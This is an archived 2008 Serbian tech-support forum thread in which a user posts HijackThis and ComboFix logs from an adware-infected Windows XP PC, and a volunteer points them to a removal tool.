MyCity » Ambulanta -> Arhiva Ambulante » virus!

virus!

Napisano na dan: 2.6.2008

virus!
Sledeća strana Pagination

Idi na vrh

Poslao: 02 Jun 2008 21:02
Idi na vrh
offline
  • Pridružio: 19 Maj 2008
  • Poruke: 5
  • Gde živiš: beograd

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:44:21, on 2.6.2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\UAService7.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
C:\Program Files\Analog Devices\SoundMAX\smax4.exe
C:\Program Files\Eset\nod32kui.exe
C:\WINDOWS\system32\WgaTray.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\AGRSMMSG.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe
C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE
C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE
C:\Program Files\LimeWire\LimeWire.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Windows Live\Messenger\usnsvc.exe
C:\Program Files\Opera\Opera.exe
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\WINDOWS\system32\wscntfy.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\Program Files\AVG\AVG8\avgfrw.exe
C:\Program Files\AVG\AVG8\avgtray.exe
C:\PROGRA~1\AVG\AVG8\avgupd.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = search.bearshare.com/sidebar.html?src=ssb
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = search.bearshare.com/intl/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = home.sweetim.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = 127.0.0.1
R3 - URLSearchHook: (no name) - {9CB65206-89C4-402c-BA80-02D8C59F9B1D} - C:\Program Files\AskTBar\SrchAstt\1.bin\A5SRCHAS.DLL (file missing)
R3 - URLSearchHook: (no name) - {00A6FAF6-072E-44cf-8957-5838F569A31D} - C:\Program Files\MyWebSearch\SrchAstt\1.bin\MWSSRCAS.DLL (file missing)
R3 - URLSearchHook: Yahoo! ¤u¨a¦C - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: MyWebSearch Search Assistant BHO - {00A6FAF1-072E-44cf-8957-5838F569A31D} - C:\Program Files\MyWebSearch\SrchAstt\1.bin\MWSSRCAS.DLL (file missing)
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: mwsBar BHO - {07B18EA1-A523-4961-B6BB-170DE4475CCA} - C:\Program Files\MyWebSearch\bar\1.bin\MWSBAR.DLL (file missing)
O2 - BHO: (no name) - {23D44BCF-AA7A-41D6-8905-E808F16322EF} - C:\WINDOWS\system32\gebbxvw.dll (file missing)
O2 - BHO: cpmsky browser optimizer - {277a0c59-78e6-99de-6946-a2a71f55165a} - C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll
O2 - BHO: {ed108e55-6531-0438-6864-6d2ea2229663} - {3669222a-e2d6-4686-8340-135655e801de} - C:\WINDOWS\system32\xhvgmvfa.dll (file missing)
O2 - BHO: adzgalore - {386c1b5e-df71-2d31-08e7-83354bf04e50} - C:\WINDOWS\system32\nskD4.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll
O2 - BHO: (no name) - {517854CF-7B97-4204-BC88-13768F2CCF61} - C:\WINDOWS\system32\ssttu.dll
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: UrlHelper Class - {74322BF9-DF26-493f-B0DA-6D2FC5E6429E} - C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live pomagac za prijavljivanje - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Ask Search Assistant BHO - {9CB65201-89C4-402c-BA80-02D8C59F9B1D} - C:\Program Files\AskTBar\SrchAstt\1.bin\A5SRCHAS.DLL (file missing)
O2 - BHO: AVG Security Toolbar - {A057A204-BACC-4D26-9990-79A187E2698E} - C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL
O2 - BHO: mysidesearch browser optimizer - {bec35b16-b03b-b4e6-8917-3250adcd93bc} - C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
O2 - BHO: Ask Toolbar BHO - {FE063DB1-4EC0-403e-8DD8-394C54984B2C} - C:\Program Files\AskTBar\bar\2.bin\ASKTBAR.DLL (file missing)
O3 - Toolbar: Ask Toolbar - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - C:\Program Files\AskTBar\bar\2.bin\ASKTBAR.DLL (file missing)
O3 - Toolbar: My Web Search - {07B18EA9-A523-4961-B6BB-170DE4475CCA} - C:\Program Files\MyWebSearch\bar\1.bin\MWSBAR.DLL (file missing)
O3 - Toolbar: Yahoo! ¤u¨a¦C - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O3 - Toolbar: BearShare MediaBar - {D3DEE18F-DB64-4BEB-9FF1-E1F0A5033E4A} - C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareMediaBar.dll
O3 - Toolbar: AVG Security Toolbar - {A057A204-BACC-4D26-9990-79A187E2698E} - C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
O4 - HKLM\..\Run: [SoundMAX] "C:\Program Files\Analog Devices\SoundMAX\smax4.exe" /tray
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
O4 - HKLM\..\Run: [bend logo clock film] C:\Documents and Settings\All Users\Application Data\Frag great bend logo\Rect blah.exe
O4 - HKLM\..\Run: [{e0b2bd96-0d3c-b2e0-b9b8-fdc3e3b7792d}] C:\WINDOWS\System32\Rundll32.exe "C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll" DllInit
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [RealInter] C:\DOCUME~1\NETWOR~1\APPLIC~1\MOVESI~1\Bat flag close.exe
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - Startup: LimeWire On Startup.lnk = C:\Program Files\LimeWire\LimeWire.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
O4 - Global Startup: Adobe Reader Synchronizer.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe
O4 - Global Startup: AudioDeck.lnk = C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe
O4 - Global Startup: Remote Controller.lnk = C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE
O4 - Global Startup: Scheduler.lnk = C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE
O8 - Extra context menu item: &Search - edits.mywebsearch.com/toolbaredits/menusearch.jhtml?p=ZN
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll
O20 - AppInit_DLLs: avgrsstx.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: SecuROM User Access Service (V7) (UserAccess7) - Unknown owner - C:\WINDOWS\system32\UAService7.exe

--
End of file - 9792 bytes

Poslao: 02 Jun 2008 21:10
Idi na vrh
offline
  • dr_Bora  Male
  • Anti Malware Fighter
    Rank 2
  • Pridružio: 24 Jul 2007
  • Poruke: 12280
  • Gde živiš: Höganäs, SE

Poz...


Skini ComboFix sa jedne od sledecih adresa na Desktop:
http://download.bleepingcomputer.com/sUBs/ComboFix.exe
http://www.forospyware.com/sUBs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Startuj ga i ne diraj prozor programa dok skenira.
Sledi uputstva na ekranu. Kada zavrsi pojavice se log (C:\ComboFix.txt) koji ces nam ovde iskopirati.

Poslao: 02 Jun 2008 21:56
Idi na vrh
offline
  • Pridružio: 19 Maj 2008
  • Poruke: 5
  • Gde živiš: beograd

ComboFix 08-06-01.6 - n 2008-06-02 21:38:59.2 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.96 [GMT 2:00]
Running from: C:\Documents and Settings\n\My Documents\ComboFix.exe

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Bob and Bill adventures - Wild Hunting.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Crazy Blocks.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Lines.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\The Battles Of Helicopters.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Video Pool.lnk
C:\WINDOWS\17PHolmes2000201.exe
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll
C:\WINDOWS\system32\arlfnpmy.ini
C:\WINDOWS\system32\bslxdnsl.ini
C:\WINDOWS\system32\exworkdw.ini
C:\WINDOWS\system32\hjechnje.ini
C:\WINDOWS\system32\hqmjjueu.ini
C:\WINDOWS\system32\iadlmobi.dll
C:\WINDOWS\system32\kxghksxx.ini
C:\WINDOWS\system32\lsndxlsb.dll
C:\WINDOWS\system32\nainpaun.ini
C:\WINDOWS\system32\nskD4.dll
C:\WINDOWS\system32\sdjwdqvw.ini
C:\WINDOWS\system32\sqlgnaju.ini
C:\WINDOWS\system32\ssttu.dll
C:\WINDOWS\system32\suubjcjh.dll
C:\WINDOWS\system32\tounsikg.ini
C:\WINDOWS\system32\uttss.ini
C:\WINDOWS\system32\uttss.ini2
C:\WINDOWS\system32\ympnflra.dll
.
---- Previous Run -------
.
C:\Program Files\Adzgalore Games Collection
C:\Program Files\Adzgalore Games Collection\BattlesOfHelicopters.exe
C:\Program Files\Adzgalore Games Collection\BobAndBill.exe
C:\Program Files\Adzgalore Games Collection\CrazyBlocks.exe
C:\Program Files\Adzgalore Games Collection\Lines.exe
C:\Program Files\Adzgalore Games Collection\uninstall.exe
C:\Program Files\Adzgalore Games Collection\VideoPool.exe
C:\WINDOWS\cookies.ini
C:\WINDOWS\system32\adzgalore-remove.exe

.
((((((((((((((((((((((((( Files Created from 2008-05-02 to 2008-06-02 )))))))))))))))))))))))))))))))
.

2008-06-02 21:32 . 2008-06-02 21:32 2,280 --a------ C:\WINDOWS\TSCTNDBG.INI
2008-06-02 20:28 . 2008-06-02 20:28 10,520 --a------ C:\WINDOWS\system32\avgrsstx.dll
2008-06-02 20:27 . 2008-06-02 20:39 <DIR> d-------- C:\WINDOWS\system32\drivers\Avg
2008-06-02 20:27 . 2008-06-02 20:27 <DIR> d-------- C:\Program Files\AVG
2008-06-02 20:27 . 2008-06-02 21:34 <DIR> d-------- C:\Documents and Settings\n\Application Data\AVGTOOLBAR
2008-06-02 20:27 . 2008-06-02 21:32 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\avg8
2008-06-02 20:27 . 2008-06-02 20:27 96,520 --a------ C:\WINDOWS\system32\drivers\avgldx86.sys
2008-06-01 20:41 . 2008-06-01 20:41 <DIR> d-------- C:\Documents and Settings\NetworkService\Application Data\move sixth tool
2008-06-01 20:40 . 2008-06-01 20:40 <DIR> d-------- C:\Documents and Settings\NetworkService\Application Data\Xfire
2008-06-01 20:36 . 2008-06-01 20:40 <DIR> d-------- C:\Documents and Settings\n\Application Data\Xfire
2008-06-01 20:35 . 2008-06-01 20:41 <DIR> d-------- C:\Program Files\Xfire
2008-06-01 20:28 . 2008-06-01 20:30 <DIR> d-------- C:\Program Files\QuickTime
2008-06-01 20:28 . 2008-06-01 20:28 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-27 21:12 . 2008-05-27 21:12 <DIR> d-------- C:\Program Files\Trend Micro
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\Program Files\Ashiyane Digital Security Team
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\MSN Emoticons
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\MSN Display Pics
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\Documents and Settings\n\Application Data\Notepad++
2008-05-24 14:21 . 2008-05-24 14:21 75 --a------ C:\WINDOWS\METROMON.INI
2008-05-24 13:19 . 2008-05-26 21:47 <DIR> d-------- C:\Program Files\AtomixMP3
2008-05-23 20:49 . 2008-05-26 21:47 <DIR> d-------- C:\Documents and Settings\n\Application Data\BearShare
2008-05-23 20:48 . 2006-11-12 11:39 483,328 --a------ C:\WINDOWS\system32\actskn45.ocx
2008-05-23 20:47 . 2008-05-23 20:52 <DIR> d-------- C:\Program Files\BearShare Applications
2008-05-17 21:07 . 2008-05-17 21:07 95,865 --a------ C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
2008-05-17 21:03 . 2008-05-17 21:03 63,916 --a------ C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
2008-05-16 16:12 . 2008-05-16 16:12 440,832 --a------ C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
2008-05-14 03:28 . 2008-05-14 03:28 41,296 --a------ C:\WINDOWS\system32\xfcodec.dll
2008-05-13 18:40 . 2008-05-13 18:40 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
2008-05-12 21:37 . 2008-05-18 20:57 <DIR> d-------- C:\Documents and Settings\n\Application Data\CenoPDF
2008-05-12 21:31 . 2008-06-02 21:33 <DIR> d-------- C:\Documents and Settings\n\Application Data\LimeWire
2008-05-12 21:28 . 2008-05-24 13:23 <DIR> d-------- C:\Program Files\LimeWire
2008-05-08 20:37 . 2008-05-08 20:19 691,545 --a------ C:\WINDOWS\unins000.exe
2008-05-08 20:37 . 2008-05-08 20:37 2,546 --a------ C:\WINDOWS\unins000.dat
2008-05-08 17:51 . 2008-05-08 17:51 <DIR> d--hsc--- C:\Program Files\Common Files\WindowsLiveInstaller
2008-05-08 17:50 . 2008-05-08 17:50 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\WLInstaller
2008-05-08 16:18 . 2008-05-12 21:16 <DIR> d-------- C:\Program Files\Spybot - Search & Destroy

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-02 19:27 --------- d-----w C:\Program Files\ESET
2008-05-27 19:26 --------- d-----w C:\Program Files\MSN Messenger
2008-05-27 19:25 --------- d-----w C:\Program Files\Messenger Plus! Live
2008-05-27 18:35 --------- d-----w C:\Program Files\Common Files\Adobe
2008-05-26 19:48 --------- d-----w C:\Program Files\Macrogaming
2008-05-26 19:47 --------- d-----w C:\Program Files\Free Download Manager
2008-05-26 19:47 --------- d-----w C:\Program Files\Championship Manager 5
2008-05-26 19:46 --------- d-----w C:\Program Files\Offline Explorer Enterprise
2008-05-24 11:23 81,920 ----a-w C:\Documents and Settings\n\Application Data\ezpinst.exe
2008-05-24 11:23 47,360 ----a-w C:\Documents and Settings\n\Application Data\pcouffin.sys
2008-05-24 11:23 --------- d-----w C:\Documents and Settings\n\Application Data\Vso
2008-05-24 09:38 --------- d-----w C:\Program Files\Yahoo!
2008-05-16 18:36 --------- d--h--w C:\Program Files\InstallShield Installation Information
2008-05-12 17:04 --------- d-----w C:\Documents and Settings\n\Application Data\uTorrent
2008-05-12 16:13 --------- d-----w C:\Documents and Settings\All Users\Application Data\Yahoo!
2008-05-08 19:22 --------- d-----w C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-05-08 15:50 --------- d-----w C:\Program Files\Windows Live
2008-04-28 20:03 --------- d-----w C:\Documents and Settings\n\Application Data\move sixth tool
2008-04-28 20:03 --------- d-----w C:\Documents and Settings\All Users\Application Data\Messenger Plus!
2008-04-28 20:02 --------- d-----w C:\Program Files\move sixth tool
2008-04-28 20:02 --------- d-----w C:\Documents and Settings\All Users\Application Data\Frag great bend logo
2008-04-28 20:01 --------- d-----w C:\Program Files\Circle Developement
2008-04-28 16:59 --------- d-----w C:\Program Files\Lystech Computing
2008-04-21 17:34 744 ----a-w C:\mail.vbs
2008-04-18 19:19 --------- d-----w C:\Program Files\Common Files\Wise Installation Wizard
2008-04-18 19:14 --------- d-----w C:\Program Files\X-Fusions Wallpaper
2008-04-10 13:08 --------- d-----w C:\Documents and Settings\n\Application Data\Yahoo!
2008-04-10 12:37 --------- d-----w C:\Program Files\MauZ Php Editor
2008-04-09 15:01 --------- d-----w C:\Documents and Settings\n\Application Data\TeamViewer
2008-04-07 15:45 --------- d-----w C:\Program Files\Apple Software Update
2008-04-07 15:44 --------- d-----w C:\Documents and Settings\All Users\Application Data\Apple
2008-04-04 19:17 --------- d-----w C:\Program Files\Vista Start Menu
2008-04-04 18:50 64,650 ----a-w C:\WINDOWS\BricoPackUninst.cmd
2008-04-04 18:50 6,106 ----a-w C:\WINDOWS\BricoPackFoldersDelete.cmd
2008-04-04 10:18 720,896 ----a-w C:\WINDOWS\iun6002.exe
2008-04-02 18:06 --------- d-----w C:\Program Files\Zone Labs
2008-04-02 10:02 --------- d-----w C:\Program Files\Java
2007-11-05 12:00 524,300 ----a-w C:\Documents and Settings\n\Application Data\position.bin
2002-01-13 03:28 1,164,456 ----a-w C:\Program Files\install_flash_player.exe
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{3669222a-e2d6-4686-8340-135655e801de}]
C:\WINDOWS\system32\xhvgmvfa.dll

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{74322BF9-DF26-493f-B0DA-6D2FC5E6429E}]
2007-10-11 15:45 402872 --a------ C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{A057A204-BACC-4D26-9990-79A187E2698E}]
2008-06-02 20:27 2050816 --a------ C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{bec35b16-b03b-b4e6-8917-3250adcd93bc}]
2008-05-16 16:12 440832 --a------ C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{A057A204-BACC-4D26-9990-79A187E2698E}"= "C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL" [2008-06-02 20:27 2050816]

[HKEY_CLASSES_ROOT\clsid\{a057a204-bacc-4d26-9990-79a187e2698e}]
[HKEY_CLASSES_ROOT\avgtoolbar.AVGTOOLBAR]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser]
"{A057A204-BACC-4D26-9990-79A187E2698E}"= C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL [2008-06-02 20:27 2050816]

[HKEY_CLASSES_ROOT\clsid\{a057a204-bacc-4d26-9990-79a187e2698e}]
[HKEY_CLASSES_ROOT\avgtoolbar.AVGTOOLBAR]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [2007-01-15 17:14 147456]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-04 03:07 15360]
"MsnMsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.exe" [2007-10-18 11:35 5724184]
"RealInter"="C:\DOCUME~1\NETWOR~1\APPLIC~1\MOVESI~1\Bat flag close.exe" [2008-04-28 22:02 479232]
"Yahoo! Pager"="C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.exe" [2007-08-30 17:43 4670704]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"="C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe" [2004-10-14 10:11 1388544]
"NeroFilterCheck"="C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [2006-01-12 16:40 155648]
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" [2002-01-07 11:13 180269]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 04:25 144784]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 10:06 88363 C:\WINDOWS\AGRSMMSG.exe]
"WinampAgent"="C:\Program Files\Winamp\winampa.exe" [2007-10-10 07:28 36352]
"bend logo clock film"="C:\Documents and Settings\All Users\Application Data\Frag great bend logo\Rect blah.exe" [2008-06-02 21:49 549888]
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" [2008-01-31 23:13 385024]
"AVG8_TRAY"="C:\PROGRA~1\AVG\AVG8\avgtray.exe" [2008-06-02 20:27 1177368]

C:\Documents and Settings\n\Start Menu\Programs\Startup\
LimeWire On Startup.lnk - C:\Program Files\LimeWire\LimeWire.exe [2008-04-18 21:21:09 147456]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe [2006-10-23 02:48:20 40048]
Adobe Reader Synchronizer.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe [2006-10-23 01:01:50 734872]
AudioDeck.lnk - C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe [2002-03-18 11:13:06 581632]
Remote Controller.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE [2002-03-18 11:37:43 102400]
Scheduler.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE [2002-03-18 11:37:43 118784]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"AppInit_DLLs"=avgrsstx.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"VIDC.AP41"= APmpg4v1.dll
"vidc.DIV3"= DivXc32.dll
"msacm.divxa32"= DivXa32.acm
"vidc.DIV4"= DivXc32f.dll
"VIDC.ACDV"= ACDV.dll
"VIDC.XFR1"= xfcodec.dll

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PowerS]
--a------ 2001-08-03 18:56 159800 C:\WINDOWS\PowerS.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RaidTool]
--------- 2004-10-11 08:54 589824 C:\Program Files\VIA\RAID\raid_tool.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
--a------ 2007-08-30 17:43 4670704 C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"WZCSVC"=2 (0x2)
"SSDPSRV"=3 (0x3)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\Program Files\\eMule\\emule.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Evil Msn\\Evil Msn 3.0.exe"=
"C:\\Program Files\\BearShare Applications\\BearShare\\BearShare.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Xfire\\xfire.exe"=
"C:\\Program Files\\AVG\\AVG8\\avgupd.exe"=

R0 videX32;videX32;C:\WINDOWS\system32\DRIVERS\videX32.sys [2006-02-23 12:38]
R1 AvgLdx86;AVG AVI Loader Driver x86;C:\WINDOWS\system32\Drivers\avgldx86.sys [2008-06-02 20:27]
R2 avg8wd;AVG8 WatchDog;C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe [2008-06-02 20:27]
